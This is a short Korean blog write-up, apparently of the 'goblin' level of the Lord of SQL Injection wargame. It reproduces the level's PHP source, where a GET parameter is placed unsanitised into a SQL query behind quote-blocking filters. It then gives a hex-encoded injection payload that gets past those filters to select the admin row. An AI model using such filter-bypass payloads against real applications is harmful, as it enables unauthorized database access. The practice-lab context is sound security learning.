http://www.wechall.net
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~");
if(preg_match('/\'|\"|\`/i', $_GET[no])) exit("No Quotes ~_~");
$query = "select id from prob_goblin where id='guest' and no={$_GET[no]}";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
if($result['id'] == 'admin') solve("goblin");
highlight_file(__FILE__);
?>
no에 GET을 받고 있다. 하지만 Quotes를 차단하는 것으로 보인다. 그렇다면 hex로 뚜까 패주면 된다!
No값에 0x27%20or%20id=0x61646D696E%23
0x27 = '
0x61646D696E = admin
%23 = #
'WarGame or CTF > Wargame' 카테고리의 다른 글
[Lord of SQL Injection] cobolt (0) | 2019.10.07 |
---|---|
[Lord of SQL Injection] gremlin (0) | 2019.10.07 |
[ctf.j0n9hyun.xyz] 보물 (0) | 2019.06.24 |
[ctf.j0n9hyun.xyz] Hash (0) | 2019.06.24 |
[ctf.j0n9hyun.xyz] Button (0) | 2019.06.24 |